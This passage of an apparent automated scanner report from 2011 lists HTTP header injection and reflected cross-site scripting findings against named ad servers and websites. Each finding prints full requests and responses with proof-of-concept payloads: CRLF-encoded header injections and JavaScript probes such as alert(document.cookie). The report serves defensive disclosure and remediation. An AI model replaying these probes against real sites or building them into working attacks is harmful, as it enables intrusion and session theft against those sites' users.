HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

5.1. http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/tnews.lee.net/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15392%0d%0ac029a9949ab was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15392%0d%0ac029a9949ab/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461?? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15392
c029a9949ab/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461:
Date: Tue, 03 May 2011 15:42:25 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14b28%0d%0a15d18364756 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14b28%0d%0a15d18364756/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14b28
15d18364756/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http: //cdslog.contextweb.com/CDSLogger/L.aspx
Date: Tue, 03 May 2011 15:42:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.3. http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b98a%0d%0a6411b0e67d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b98a%0d%0a6411b0e67d0/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7b98a
6411b0e67d0/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228:
Date: Tue, 03 May 2011 15:44:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e6567%0d%0aedcda395a45 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=e6567%0d%0aedcda395a45&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e6567
edcda395a45;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2322

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e6567
ed
...[SNIP]...

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 18d0f%0d%0a36d0a27c0b4 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=18d0f%0d%0a36d0a27c0b4&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:18d0f
36d0a27c0b4;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89ZkdupVLqY8Dm7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2869

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',18d0f
36
...[SNIP]...

5.6. http://www.askdramy.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.askdramy.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a720f%0d%0a24490a51821 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a720f%0d%0a24490a51821 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.askdramy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:42:41 GMT
Location: /a720f
24490a51821/

5.7. http://www.grubhub.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.grubhub.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cd452%0d%0aa194e2e2a1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cd452%0d%0aa194e2e2a1a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grubhub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:28:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=A365883DD17EA18AD1623BFA28073728.worker3; Path=/
Location: /cd452
a194e2e2a1a/
Content-Length: 0
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:28:28 GMT
Content-Type: text/plain; charset=UTF-8

5.8. http://www.haircuttery.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.haircuttery.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31e48%0d%0ab59fdd1e939 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31e48%0d%0ab59fdd1e939 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.haircuttery.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 11:27:09 GMT
Server: Apache
Location: http://www.haircuttery.com/31e48
b59fdd1e939/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5.9. http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homebasedofficework.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e3ad%0d%0a25fc8e03120 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e3ad%0d%0a25fc8e03120 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebasedofficework.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:11:26 GMT
Location: /6e3ad
25fc8e03120/

5.10. http://www.imaxenes.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.imaxenes.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 867ba%0d%0a01729b53b75 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /867ba%0d%0a01729b53b75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:39 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/867ba
01729b53b75
Content-Type: text/html
Content-Length: 1185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...

6. Cross-site scripting (reflected) previous next
There are 140 instances of this issue:

http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2]
http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter]
http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter]
http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter]
http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter]
http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter]
http://servedby.flashtalking.com/imp/3/15881 [ftx parameter]
http://servedby.flashtalking.com/imp/3/15881 [fty parameter]
http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://www.610wtvn.com/favicon.ico [REST URL parameter 1]
http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.alvinisd.net/favicon.ico [REST URL parameter 1]
http://www.am570radio.com/favicon.ico [REST URL parameter 1]
http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1]
http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.bvonstyle.com/favicon.ico [REST URL parameter 1]
http://www.cashstore.com/favicon.ico [REST URL parameter 1]
http://www.cerritos.edu/favicon.ico [REST URL parameter 1]
http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1]
http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.diethealthclub.com/favicon.ico [REST URL parameter 1]
http://www.fluke.com/favicon.ico [REST URL parameter 1]
http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1]
http://www.greatnow.com/favicon.ico [REST URL parameter 1]
http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1]
http://www.healthiertalk.com/favicon.ico [REST URL parameter 1]
http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]
http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]
http://www.homegauge.com/favicon.ico [REST URL parameter 1]
http://www.hymnary.org/favicon.ico [REST URL parameter 1]
http://www.logicbuy.com/favicon.ico [REST URL parameter 1]
http://www.makefive.com/favicon.ico [REST URL parameter 1]
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter]
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter]
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter]
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter]
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter]
http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]
http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]
http://www.maysville-online.com/content/ [REST URL parameter 1]
http://www.maysville-online.com/content/ [REST URL parameter 1]
http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter]
http://www.maysville-online.com/favicon.ico [REST URL parameter 1]
http://www.maysville-online.com/favicon.ico [REST URL parameter 1]
http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]
http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]
http://www.ntra.com/favicon.ico [REST URL parameter 1]
http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.osbornewood.com/favicon.ico [REST URL parameter 1]
http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.pordeo.com/favicon.ico [REST URL parameter 1]
http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1]
http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.pusd.org/favicon.ico [REST URL parameter 1]
http://www.reflector.com/favicon.ico [REST URL parameter 1]
http://www.schneider.com/favicon.ico [REST URL parameter 1]
http://www.sport-tube.com/favicon.ico [REST URL parameter 1]
http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]
http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]
http://www.straight.com/favicon.ico [REST URL parameter 1]
http://www.thedailycat.com/favicon.ico [REST URL parameter 1]
http://www.thomann.de/favicon.ico [REST URL parameter 1]
http://www.tradearca.com/favicon.ico [REST URL parameter 1]
http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1]
http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.upmystreet.com/favicon.ico [REST URL parameter 1]
http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.vivareal.us/favicon.ico [REST URL parameter 1]
http://www.wdasfm.com/favicon.ico [REST URL parameter 1]
http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.web-stat.net/favicon.ico [REST URL parameter 1]
http://www.webdesign.org/favicon.ico [REST URL parameter 1]
http://www.webdesign.org/favicon.ico [REST URL parameter 1]
http://www.wireless-driver.com/favicon.ico [REST URL parameter 1]
http://www.xcomment.com/favicon.ico [REST URL parameter 1]
http://www.xcomment.com/favicon.ico [REST URL parameter 1]
http://www.xcomment.com/favicon.ico [REST URL parameter 1]
http://www.xcomment.com/favicon.ico [REST URL parameter 1]
http://www.boomboomflicks.com/favicon.ico [Referer HTTP header]
http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header]
http://www.prosolutionpills.com/favicon.ico [Referer HTTP header]
http://www.tradearca.com/favicon.ico [Referer HTTP header]
http://www.youngtubeclub.com/favicon.ico [Referer HTTP header]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]
http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]
http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]
http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]
http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]
http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.imaxenes.com/favicon.ico [REST URL parameter 1]
http://www.imaxenes.com/favicon.ico [REST URL parameter 1]
http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]
http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.timeswv.com/favicon.ico [REST URL parameter 1]
http://www.timeswv.com/favicon.ico [REST URL parameter 1]
http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

6.1. http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58406'-alert(1)-'d4ead3c9a98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;ord=0.3433780161396228? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 447
Date: Tue, 03 May 2011 15:43:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:27 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490e18de56; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:27 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:27 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;net=cm;ord=0.3433780161396228;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.2. http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_lee/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291cc'-alert(1)-'8906a7a5ed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
